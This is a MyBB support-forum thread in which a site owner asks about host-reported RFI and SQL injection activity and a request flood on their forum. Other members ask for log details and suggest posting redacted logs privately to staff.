MyBB Community Forums

Full Version: SQL Injection
You're currently viewing a stripped down version of our content. View the full version with proper formatting.
Hello.

My host is reporting to me that my site have some weird things related to RFI(Remote File Inclusion) and SQL Injection.

Well, my website hasn't login or any other validation, just my forums, that use MyBB 1.6.5.

I remember that some days ago I changed a php.ini config that was:

allow_url_fopen

It was "off" and I changed to "on" to test something. Well, I forget it as "on" and as I posted some days ago people started with a mass login into my forum, so I just set it to "off" again and LOOK'S LIKE that that problem stopped.

I'm not that good with web programming and they gave some logs about those RFI and SQL Injection, but I couldn't undestand, so if someone would like to check it I can send it via PM since it contains some folders from my server etc.

I don't belive that MyBB has the SQL Injection vulnerability, but in any case it's better to confirm.

Thank you
Your post roughly translates to "I believe there is a monster under my bed". More accurate translation would be "I believe there is a monster" because you didn't even give enough information to even venture a vague guess such as "under the bed" or "in the cupboard" or whatever. In other words its completely and utterly pointless.

It would help if you could actually put any information into your post that would point to either a file or query or error message or malformed request or whatever. Then maybe someone could tell you if it's MyBB, or a plugin, or just funny bots doing injection-looking requests for no fathomable reason or what.
I found the guy who was crashing the forum with multiple access, he told me that he was just sending a lot of requests to a single page, so my host block the forum because of the max_users_connection

The point is about that thing of RFI and SQL Injection, and as I said I can send the log files that my host sent to me because I wont post it in public.
It's DDoS, I believe. Overloading the server (your host) with too many requests, causing it to shut down.
(2012-01-24, 12:33 AM)maozao Wrote: [ -> ]The point is about that thing of RFI and SQL Injection, and as I said I can send the log files that my host sent to me because I wont post it in public.

Then we can not help you. I would suggest that you post the portion of your log file in question to the Private Inquiries forum and ask for help there. Only you and staff can read your posts there, so its not in public.
Sorry about my earlier comment, then. Seems I've missed the bit with the log files. Smile
Or you could copy a portion of the log and edit out any details in it (/home/real could be changed to /home/myhomedir )